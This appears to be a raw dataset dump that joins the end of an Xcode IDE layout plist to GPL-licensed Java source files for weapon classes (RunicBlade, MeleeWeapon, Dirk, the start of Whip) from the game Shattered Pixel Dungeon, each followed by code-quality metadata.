<string>Debugger Console</string>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{{0, 0}, {650, 250}}</string>
<key>RubberWindowFrame</key>
<string>516 632 650 250 0 0 1680 1027 </string>
</dict>
<key>Module</key>
<string>PBXDebugCLIModule</string>
<key>Proportion</key>
<string>209pt</string>
</dict>
</array>
<key>Proportion</key>
<string>209pt</string>
</dict>
</array>
<key>Name</key>
<string>Debugger Console</string>
<key>ServiceClasses</key>
<array>
<string>PBXDebugCLIModule</string>
</array>
<key>StatusbarIsVisible</key>
<integer>1</integer>
<key>TableOfContents</key>
<array>
<string>1C78EAAD065D492600B07095</string>
<string>1C78EAAE065D492600B07095</string>
<string>1C78EAAC065D492600B07095</string>
</array>
<key>ToolbarConfiguration</key>
<string>xcode.toolbar.config.consoleV3</string>
<key>WindowString</key>
<string>650 41 650 250 0 0 1280 1002 </string>
<key>WindowToolGUID</key>
<string>1C78EAAD065D492600B07095</string>
<key>WindowToolIsVisible</key>
<integer>0</integer>
</dict>
<dict>
<key>Identifier</key>
<string>windowTool.snapshots</string>
<key>Layout</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>Module</key>
<string>XCSnapshotModule</string>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Name</key>
<string>Snapshots</string>
<key>ServiceClasses</key>
<array>
<string>XCSnapshotModule</string>
</array>
<key>StatusbarIsVisible</key>
<string>Yes</string>
<key>ToolbarConfiguration</key>
<string>xcode.toolbar.config.snapshots</string>
<key>WindowString</key>
<string>315 824 300 550 0 0 1440 878 </string>
<key>WindowToolIsVisible</key>
<string>Yes</string>
</dict>
<dict>
<key>Identifier</key>
<string>windowTool.scm</string>
<key>Layout</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>ContentConfiguration</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1C78EAB2065D492600B07095</string>
<key>PBXProjectModuleLabel</key>
<string><No Editor></string>
<key>PBXSplitModuleInNavigatorKey</key>
<dict>
<key>Split0</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1C78EAB3065D492600B07095</string>
</dict>
<key>SplitCount</key>
<string>1</string>
</dict>
<key>StatusBarVisibility</key>
<integer>1</integer>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{{0, 0}, {452, 0}}</string>
<key>RubberWindowFrame</key>
<string>743 379 452 308 0 0 1280 1002 </string>
</dict>
<key>Module</key>
<string>PBXNavigatorGroup</string>
<key>Proportion</key>
<string>0pt</string>
</dict>
<dict>
<key>BecomeActive</key>
<integer>1</integer>
<key>ContentConfiguration</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1CD052920623707200166675</string>
<key>PBXProjectModuleLabel</key>
<string>SCM</string>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>ConsoleFrame</key>
<string>{{0, 259}, {452, 0}}</string>
<key>Frame</key>
<string>{{0, 7}, {452, 259}}</string>
<key>RubberWindowFrame</key>
<string>743 379 452 308 0 0 1280 1002 </string>
<key>TableConfiguration</key>
<array>
<string>Status</string>
<real>30</real>
<string>FileName</string>
<real>199</real>
<string>Path</string>
<real>197.09500122070312</real>
</array>
<key>TableFrame</key>
<string>{{0, 0}, {452, 250}}</string>
</dict>
<key>Module</key>
<string>PBXCVSModule</string>
<key>Proportion</key>
<string>262pt</string>
</dict>
</array>
<key>Proportion</key>
<string>266pt</string>
</dict>
</array>
<key>Name</key>
<string>SCM</string>
<key>ServiceClasses</key>
<array>
<string>PBXCVSModule</string>
</array>
<key>StatusbarIsVisible</key>
<integer>1</integer>
<key>TableOfContents</key>
<array>
<string>1C78EAB4065D492600B07095</string>
<string>1C78EAB5065D492600B07095</string>
<string>1C78EAB2065D492600B07095</string>
<string>1CD052920623707200166675</string>
</array>
<key>ToolbarConfiguration</key>
<string>xcode.toolbar.config.scm</string>
<key>WindowString</key>
<string>743 379 452 308 0 0 1280 1002 </string>
</dict>
<dict>
<key>Identifier</key>
<string>windowTool.breakpoints</string>
<key>IsVertical</key>
<integer>0</integer>
<key>Layout</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>BecomeActive</key>
<integer>1</integer>
<key>ContentConfiguration</key>
<dict>
<key>PBXBottomSmartGroupGIDs</key>
<array>
<string>1C77FABC04509CD000000102</string>
</array>
<key>PBXProjectModuleGUID</key>
<string>1CE0B1FE06471DED0097A5F4</string>
<key>PBXProjectModuleLabel</key>
<string>Files</string>
<key>PBXProjectStructureProvided</key>
<string>no</string>
<key>PBXSmartGroupTreeModuleColumnData</key>
<dict>
<key>PBXSmartGroupTreeModuleColumnWidthsKey</key>
<array>
<real>168</real>
</array>
<key>PBXSmartGroupTreeModuleColumnsKey_v4</key>
<array>
<string>MainColumn</string>
</array>
</dict>
<key>PBXSmartGroupTreeModuleOutlineStateKey_v7</key>
<dict>
<key>PBXSmartGroupTreeModuleOutlineStateExpansionKey</key>
<array>
<string>1C77FABC04509CD000000102</string>
</array>
<key>PBXSmartGroupTreeModuleOutlineStateSelectionKey</key>
<array>
<array>
<integer>0</integer>
</array>
</array>
<key>PBXSmartGroupTreeModuleOutlineStateVisibleRectKey</key>
<string>{{0, 0}, {168, 350}}</string>
</dict>
<key>PBXTopSmartGroupGIDs</key>
<array/>
<key>XCIncludePerspectivesSwitch</key>
<integer>0</integer>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{{0, 0}, {185, 368}}</string>
<key>GroupTreeTableConfiguration</key>
<array>
<string>MainColumn</string>
<real>168</real>
</array>
<key>RubberWindowFrame</key>
<string>315 424 744 409 0 0 1440 878 </string>
</dict>
<key>Module</key>
<string>PBXSmartGroupTreeModule</string>
<key>Proportion</key>
<string>185pt</string>
</dict>
<dict>
<key>ContentConfiguration</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1CA1AED706398EBD00589147</string>
<key>PBXProjectModuleLabel</key>
<string>Detail</string>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{{190, 0}, {554, 368}}</string>
<key>RubberWindowFrame</key>
<string>315 424 744 409 0 0 1440 878 </string>
</dict>
<key>Module</key>
<string>XCDetailModule</string>
<key>Proportion</key>
<string>554pt</string>
</dict>
</array>
<key>Proportion</key>
<string>368pt</string>
</dict>
</array>
<key>MajorVersion</key>
<integer>3</integer>
<key>MinorVersion</key>
<integer>0</integer>
<key>Name</key>
<string>Breakpoints</string>
<key>ServiceClasses</key>
<array>
<string>PBXSmartGroupTreeModule</string>
<string>XCDetailModule</string>
</array>
<key>StatusbarIsVisible</key>
<integer>1</integer>
<key>TableOfContents</key>
<array>
<string>1CDDB66807F98D9800BB5817</string>
<string>1CDDB66907F98D9800BB5817</string>
<string>1CE0B1FE06471DED0097A5F4</string>
<string>1CA1AED706398EBD00589147</string>
</array>
<key>ToolbarConfiguration</key>
<string>xcode.toolbar.config.breakpointsV3</string>
<key>WindowString</key>
<string>315 424 744 409 0 0 1440 878 </string>
<key>WindowToolGUID</key>
<string>1CDDB66807F98D9800BB5817</string>
<key>WindowToolIsVisible</key>
<integer>1</integer>
</dict>
<dict>
<key>Identifier</key>
<string>windowTool.debugAnimator</string>
<key>Layout</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>Module</key>
<string>PBXNavigatorGroup</string>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Name</key>
<string>Debug Visualizer</string>
<key>ServiceClasses</key>
<array>
<string>PBXNavigatorGroup</string>
</array>
<key>StatusbarIsVisible</key>
<integer>1</integer>
<key>ToolbarConfiguration</key>
<string>xcode.toolbar.config.debugAnimatorV3</string>
<key>WindowString</key>
<string>100 100 700 500 0 0 1280 1002 </string>
</dict>
<dict>
<key>Identifier</key>
<string>windowTool.bookmarks</string>
<key>Layout</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>Module</key>
<string>PBXBookmarksModule</string>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Name</key>
<string>Bookmarks</string>
<key>ServiceClasses</key>
<array>
<string>PBXBookmarksModule</string>
</array>
<key>StatusbarIsVisible</key>
<integer>0</integer>
<key>WindowString</key>
<string>538 42 401 187 0 0 1280 1002 </string>
</dict>
<dict>
<key>Identifier</key>
<string>windowTool.projectFormatConflicts</string>
<key>Layout</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>Module</key>
<string>XCProjectFormatConflictsModule</string>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Name</key>
<string>Project Format Conflicts</string>
<key>ServiceClasses</key>
<array>
<string>XCProjectFormatConflictsModule</string>
</array>
<key>StatusbarIsVisible</key>
<integer>0</integer>
<key>WindowContentMinSize</key>
<string>450 300</string>
<key>WindowString</key>
<string>50 850 472 307 0 0 1440 877</string>
</dict>
<dict>
<key>Identifier</key>
<string>windowTool.classBrowser</string>
<key>Layout</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>BecomeActive</key>
<integer>1</integer>
<key>ContentConfiguration</key>
<dict>
<key>OptionsSetName</key>
<string>Hierarchy, all classes</string>
<key>PBXProjectModuleGUID</key>
<string>1CA6456E063B45B4001379D8</string>
<key>PBXProjectModuleLabel</key>
<string>Class Browser - NSObject</string>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>ClassesFrame</key>
<string>{{0, 0}, {374, 96}}</string>
<key>ClassesTreeTableConfiguration</key>
<array>
<string>PBXClassNameColumnIdentifier</string>
<real>208</real>
<string>PBXClassBookColumnIdentifier</string>
<real>22</real>
</array>
<key>Frame</key>
<string>{{0, 0}, {630, 331}}</string>
<key>MembersFrame</key>
<string>{{0, 105}, {374, 395}}</string>
<key>MembersTreeTableConfiguration</key>
<array>
<string>PBXMemberTypeIconColumnIdentifier</string>
<real>22</real>
<string>PBXMemberNameColumnIdentifier</string>
<real>216</real>
<string>PBXMemberTypeColumnIdentifier</string>
<real>97</real>
<string>PBXMemberBookColumnIdentifier</string>
<real>22</real>
</array>
<key>PBXModuleWindowStatusBarHidden2</key>
<integer>1</integer>
<key>RubberWindowFrame</key>
<string>385 179 630 352 0 0 1440 878 </string>
</dict>
<key>Module</key>
<string>PBXClassBrowserModule</string>
<key>Proportion</key>
<string>332pt</string>
</dict>
</array>
<key>Proportion</key>
<string>332pt</string>
</dict>
</array>
<key>Name</key>
<string>Class Browser</string>
<key>ServiceClasses</key>
<array>
<string>PBXClassBrowserModule</string>
</array>
<key>StatusbarIsVisible</key>
<integer>0</integer>
<key>TableOfContents</key>
<array>
<string>1C0AD2AF069F1E9B00FABCE6</string>
<string>1C0AD2B0069F1E9B00FABCE6</string>
<string>1CA6456E063B45B4001379D8</string>
</array>
<key>ToolbarConfiguration</key>
<string>xcode.toolbar.config.classbrowser</string>
<key>WindowString</key>
<string>385 179 630 352 0 0 1440 878 </string>
<key>WindowToolGUID</key>
<string>1C0AD2AF069F1E9B00FABCE6</string>
<key>WindowToolIsVisible</key>
<integer>0</integer>
</dict>
<dict>
<key>Identifier</key>
<string>windowTool.refactoring</string>
<key>IncludeInToolsMenu</key>
<integer>0</integer>
<key>Layout</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>BecomeActive</key>
<integer>1</integer>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{0, 0}, {500, 335}</string>
<key>RubberWindowFrame</key>
<string>{0, 0}, {500, 335}</string>
</dict>
<key>Module</key>
<string>XCRefactoringModule</string>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Name</key>
<string>Refactoring</string>
<key>ServiceClasses</key>
<array>
<string>XCRefactoringModule</string>
</array>
<key>WindowString</key>
<string>200 200 500 356 0 0 1920 1200 </string>
</dict>
</array>
</dict>
</plist>
| 40,380 | blam | mode1v3 | en | unknown | unknown | {} | 0 | {} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/RunicBlade.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class RunicBlade extends MeleeWeapon {
{
image = ItemSpriteSheet.RUNIC_BLADE;
tier = 4;
}
//Essentially it's a tier 4 weapon, with tier 3 base max damage, and tier 5 scaling.
//equal to tier 4 in damage at +5
@Override
public int max(int lvl) {
return 5*(tier) + //20 base, down from 25
Math.round(lvl*(tier+2)); //+6 per level, up from +5
}
}
| 1,315 | RunicBlade | java | en | java | code | {"qsc_code_num_words": 195, "qsc_code_num_chars": 1315.0, "qsc_code_mean_word_length": 4.86666667, "qsc_code_frac_words_unique": 0.62051282, "qsc_code_frac_chars_top_2grams": 0.03477345, "qsc_code_frac_chars_top_3grams": 0.04109589, "qsc_code_frac_chars_top_4grams": 0.06006322, "qsc_code_frac_chars_dupe_5grams": 0.08640674, "qsc_code_frac_chars_dupe_6grams": 0.05900948, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02941176, "qsc_code_frac_chars_whitespace": 0.19847909, "qsc_code_size_file_byte": 1315.0, "qsc_code_num_lines": 41.0, "qsc_code_num_chars_line_max": 86.0, "qsc_code_num_chars_line_mean": 32.07317073, "qsc_code_frac_chars_alphabet": 0.87096774, "qsc_code_frac_chars_comments": 0.72015209, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.07692308, "qsc_codejava_score_lines_no_logic": 0.23076923, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/MeleeWeapon.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.Weapon;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.watabou.utils.Random;
public class MeleeWeapon extends Weapon {
public int tier;
@Override
public int min(int lvl) {
return tier + //base
lvl; //level scaling
}
@Override
public int max(int lvl) {
return 5*(tier+1) + //base
lvl*(tier+1); //level scaling
}
public int STRReq(int lvl){
lvl = Math.max(0, lvl);
//strength req decreases at +1,+3,+6,+10,etc.
return (8 + tier * 2) - (int)(Math.sqrt(8 * lvl + 1) - 1)/2;
}
@Override
public int damageRoll(Char owner) {
int damage = augment.damageFactor(super.damageRoll( owner ));
if (owner instanceof Hero) {
int exStr = ((Hero)owner).STR() - STRReq();
if (exStr > 0) {
damage += Random.IntRange( 0, exStr );
}
}
return damage;
}
@Override
public String info() {
String info = desc();
if (levelKnown) {
info += "\n\n" + Messages.get(MeleeWeapon.class, "stats_known", tier, augment.damageFactor(min()), augment.damageFactor(max()), STRReq());
if (STRReq() > Dungeon.hero.STR()) {
info += " " + Messages.get(Weapon.class, "too_heavy");
} else if (Dungeon.hero.STR() > STRReq()){
info += " " + Messages.get(Weapon.class, "excess_str", Dungeon.hero.STR() - STRReq());
}
} else {
info += "\n\n" + Messages.get(MeleeWeapon.class, "stats_unknown", tier, min(0), max(0), STRReq(0));
if (STRReq(0) > Dungeon.hero.STR()) {
info += " " + Messages.get(MeleeWeapon.class, "probably_too_heavy");
}
}
String statsInfo = statsInfo();
if (!statsInfo.equals("")) info += "\n\n" + statsInfo;
switch (augment) {
case SPEED:
info += "\n\n" + Messages.get(Weapon.class, "faster");
break;
case DAMAGE:
info += "\n\n" + Messages.get(Weapon.class, "stronger");
break;
case NONE:
}
if (enchantment != null && (cursedKnown || !enchantment.curse())){
info += "\n\n" + Messages.get(Weapon.class, "enchanted", enchantment.name());
info += " " + Messages.get(enchantment, "desc");
}
if (cursed && isEquipped( Dungeon.hero )) {
info += "\n\n" + Messages.get(Weapon.class, "cursed_worn");
} else if (cursedKnown && cursed) {
info += "\n\n" + Messages.get(Weapon.class, "cursed");
} else if (!isIdentified() && cursedKnown){
info += "\n\n" + Messages.get(Weapon.class, "not_cursed");
}
return info;
}
public String statsInfo(){
return Messages.get(this, "stats_desc");
}
@Override
public int price() {
int price = 20 * tier;
if (hasGoodEnchant()) {
price *= 1.5;
}
if (cursedKnown && (cursed || hasCurseEnchant())) {
price /= 2;
}
if (levelKnown && level() > 0) {
price *= (level() + 1);
}
if (price < 1) {
price = 1;
}
return price;
}
}
| 3,867 | MeleeWeapon | java | en | java | code | {"qsc_code_num_words": 490, "qsc_code_num_chars": 3867.0, "qsc_code_mean_word_length": 5.12857143, "qsc_code_frac_words_unique": 0.34081633, "qsc_code_frac_chars_top_2grams": 0.0569041, "qsc_code_frac_chars_top_3grams": 0.02148826, "qsc_code_frac_chars_top_4grams": 0.04456825, "qsc_code_frac_chars_dupe_5grams": 0.25109431, "qsc_code_frac_chars_dupe_6grams": 0.14723438, "qsc_code_frac_chars_dupe_7grams": 0.10187027, "qsc_code_frac_chars_dupe_8grams": 0.05730203, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0150786, "qsc_code_frac_chars_whitespace": 0.1939488, "qsc_code_size_file_byte": 3867.0, "qsc_code_num_lines": 136.0, "qsc_code_num_chars_line_max": 142.0, "qsc_code_num_chars_line_mean": 28.43382353, "qsc_code_frac_chars_alphabet": 0.79114533, "qsc_code_frac_chars_comments": 0.22446341, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.07368421, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.05501834, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.07368421, "qsc_codejava_score_lines_no_logic": 0.18947368, "qsc_codejava_frac_words_no_modifier": 0.875, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/Dirk.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.Mob;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.watabou.utils.Random;
public class Dirk extends MeleeWeapon {
{
image = ItemSpriteSheet.DIRK;
tier = 2;
}
@Override
public int max(int lvl) {
return 4*(tier+1) + //12 base, down from 15
lvl*(tier+1); //scaling unchanged
}
@Override
public int damageRoll(Char owner) {
if (owner instanceof Hero) {
Hero hero = (Hero)owner;
Char enemy = hero.enemy();
if (enemy instanceof Mob && ((Mob) enemy).surprisedBy(hero)) {
//deals 67% toward max to max on surprise, instead of min to max.
int diff = max() - min();
int damage = augment.damageFactor(Random.NormalIntRange(
min() + Math.round(diff*0.67f),
max()));
int exStr = hero.STR() - STRReq();
if (exStr > 0) {
damage += Random.IntRange(0, exStr);
}
return damage;
}
}
return super.damageRoll(owner);
}
}
| 1,970 | Dirk | java | en | java | code | {"qsc_code_num_words": 264, "qsc_code_num_chars": 1970.0, "qsc_code_mean_word_length": 5.29924242, "qsc_code_frac_words_unique": 0.54545455, "qsc_code_frac_chars_top_2grams": 0.06075768, "qsc_code_frac_chars_top_3grams": 0.13581129, "qsc_code_frac_chars_top_4grams": 0.12580415, "qsc_code_frac_chars_dupe_5grams": 0.16583274, "qsc_code_frac_chars_dupe_6grams": 0.04002859, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02003757, "qsc_code_frac_chars_whitespace": 0.1893401, "qsc_code_size_file_byte": 1970.0, "qsc_code_num_lines": 64.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 30.78125, "qsc_code_frac_chars_alphabet": 0.85597996, "qsc_code_frac_chars_comments": 0.45076142, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.05555556, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.05555556, "qsc_codejava_score_lines_no_logic": 0.25, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/Whip.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
